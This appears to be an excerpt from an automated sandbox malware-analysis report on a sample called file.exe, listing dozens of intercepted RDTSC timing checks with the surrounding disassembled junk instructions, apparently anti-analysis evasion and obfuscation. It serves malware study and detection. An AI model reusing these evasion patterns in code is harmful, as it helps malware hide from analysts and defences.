            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF44B4 second address: CF44B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF36E4 second address: CF3701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2B4D4AC9F8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF44B8 second address: CF44C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF256F second address: CF2575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF44C6 second address: CF44E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF44E2 second address: CF44F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9EDh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5423 second address: CF542D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4686 second address: CF468A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF542D second address: CF544B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007F2B4CC6E2B1h 0x00000011 pop eax 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF544B second address: CF54B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007F2B4D4AC9E6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1BF1h], edx 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D1F3Dh], eax 0x0000001b push 00000000h 0x0000001d jmp 00007F2B4D4AC9F9h 0x00000022 mov dword ptr [ebp+1244B46Ah], eax 0x00000028 push eax 0x00000029 pushad 0x0000002a jmp 00007F2B4D4AC9F6h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F2B4D4AC9F5h 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5613 second address: CF5617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF73C2 second address: CF73C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF65F9 second address: CF660B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2B4CC6E2A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF73C6 second address: CF73D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF660B second address: CF660F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF831D second address: CF8321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF92AB second address: CF92C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jns 00007F2B4CC6E2B4h 0x0000000d pushad 0x0000000e js 00007F2B4CC6E2A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF8467 second address: CF846E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF947D second address: CF9492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jl 00007F2B4CC6E2A8h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFD11F second address: CFD150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F0h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F2B4D4AC9F8h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D03551 second address: D03572 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2B4CC6E2A6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2B4CC6E2B1h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D071A6 second address: D071AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D071AC second address: D071B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0E1B4 second address: D0E1E9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2B4D4AC9F2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jng 00007F2B4D4AC9E6h 0x00000013 jmp 00007F2B4D4AC9F5h 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0E1E9 second address: D0E1EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0E1EF second address: D0E1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0E1F5 second address: D0E1F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0E1F9 second address: D0E222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F9h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F2B4D4AC9E6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0D984 second address: D0D98C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0D98C second address: D0D9D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F2B4D4AC9F3h 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jc 00007F2B4D4AC9E6h 0x00000019 jo 00007F2B4D4AC9E6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 jg 00007F2B4D4AC9E6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0D9D5 second address: D0D9DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0DB24 second address: D0DB28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0DB28 second address: D0DB46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2B4CC6E2B8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0DB46 second address: D0DB64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9F8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0DB64 second address: D0DB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0DB68 second address: D0DBB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F2B4D4ACA01h 0x00000015 jp 00007F2B4D4AC9F2h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0DD2C second address: D0DD41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2ACh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0DEB6 second address: D0DEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13724 second address: D1374A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push ebx 0x00000008 jmp 00007F2B4CC6E2AFh 0x0000000d jc 00007F2B4CC6E2A6h 0x00000013 pop ebx 0x00000014 jc 00007F2B4CC6E2ACh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1374A second address: D13754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13754 second address: D13774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F2B4CC6E2A6h 0x0000000e jmp 00007F2B4CC6E2B2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D138D4 second address: D138D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D138D9 second address: D13916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 je 00007F2B4CC6E2B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2B4CC6E2B5h 0x00000017 js 00007F2B4CC6E2A6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13916 second address: D13920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13920 second address: D13924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13924 second address: D1394F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2B4D4AC9ECh 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13C72 second address: D13C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13C7A second address: D13C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13C7E second address: D13C82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1408E second address: D14095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D143A7 second address: D143AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D143AC second address: D143B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D143B2 second address: D143B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D146A1 second address: D146D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F2B4D4AC9F8h 0x00000012 je 00007F2B4D4AC9E6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D146D1 second address: D146D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D146D7 second address: D146EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9EFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D146EA second address: D146F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCBB34 second address: CCBB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCBB38 second address: CCBB60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F2B4CC6E2AEh 0x0000000e jmp 00007F2B4CC6E2ACh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCBB60 second address: CCBB87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2B4D4AC9F2h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 ja 00007F2B4D4AC9E6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCBB87 second address: CCBBAE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2B4CC6E2B8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2B4CC6E2ABh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE87E4 second address: CE88B9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2B4D4AC9E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d mov dword ptr [ebp+122D2434h], ebx 0x00000013 mov dword ptr [ebp+1244BB87h], ecx 0x00000019 push dword ptr fs:[00000000h] 0x00000020 add dword ptr [ebp+1246064Fh], ecx 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push ecx 0x0000002e sub edi, 1D1E0D30h 0x00000034 pop edi 0x00000035 mov dword ptr [ebp+124864FDh], esp 0x0000003b mov edi, dword ptr [ebp+122D3330h] 0x00000041 cmp dword ptr [ebp+122D2AF7h], 00000000h 0x00000048 jne 00007F2B4D4ACAC8h 0x0000004e push 00000000h 0x00000050 push ebp 0x00000051 call 00007F2B4D4AC9E8h 0x00000056 pop ebp 0x00000057 mov dword ptr [esp+04h], ebp 0x0000005b add dword ptr [esp+04h], 00000014h 0x00000063 inc ebp 0x00000064 push ebp 0x00000065 ret 0x00000066 pop ebp 0x00000067 ret 0x00000068 mov byte ptr [ebp+122D1CA5h], 00000047h 0x0000006f push 00000000h 0x00000071 push ebx 0x00000072 call 00007F2B4D4AC9E8h 0x00000077 pop ebx 0x00000078 mov dword ptr [esp+04h], ebx 0x0000007c add dword ptr [esp+04h], 00000017h 0x00000084 inc ebx 0x00000085 push ebx 0x00000086 ret 0x00000087 pop ebx 0x00000088 ret 0x00000089 mov eax, D49AA7D2h 0x0000008e jc 00007F2B4D4AC9E6h 0x00000094 call 00007F2B4D4AC9ECh 0x00000099 jmp 00007F2B4D4AC9F3h 0x0000009e pop edi 0x0000009f push eax 0x000000a0 push eax 0x000000a1 push edx 0x000000a2 jne 00007F2B4D4AC9F5h 0x000000a8 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE8D55 second address: CE8D69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2B4CC6E2ACh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE8FBE second address: CE8FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE9137 second address: CE914D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE914D second address: CE9153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE94DB second address: CE9535 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F2B4CC6E2A8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 0000001Eh 0x0000002d mov cx, B22Fh 0x00000031 mov edx, dword ptr [ebp+122D33D8h] 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE9535 second address: CE9539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE9539 second address: CE9543 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE9805 second address: CE980F instructions: 0x00000000 rdtsc 0x00000002 js 00007F2B4D4AC9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE980F second address: CE9836 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2B4CC6E2A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2B4CC6E2B4h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE9897 second address: CE98C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2B4D4AC9F7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE98C0 second address: CE98C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18BD5 second address: D18BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18BD9 second address: D18BDF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18BDF second address: D18BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18BE8 second address: D18BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18BED second address: D18BF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18BF2 second address: D18BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18BFA second address: D18C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F2B4D4AC9EBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18D65 second address: D18D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18EFB second address: D18F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18F17 second address: D18F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18F1B second address: D18F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18F27 second address: D18F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18F2F second address: D18F3C instructions: 0x00000000 rdtsc 0x00000002 je 00007F2B4D4AC9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D19098 second address: D1909C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1949C second address: D19512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F9h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F2B4D4AC9F8h 0x00000010 popad 0x00000011 jmp 00007F2B4D4AC9F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 jmp 00007F2B4D4AC9ECh 0x0000001e pop ebx 0x0000001f jmp 00007F2B4D4AC9F8h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D19659 second address: D1969C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F2B4CC6E2A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2B4CC6E2B2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2B4CC6E2B0h 0x00000018 jmp 00007F2B4CC6E2B3h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1969C second address: D196AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F2B4D4AC9E6h 0x0000000e rdtsc
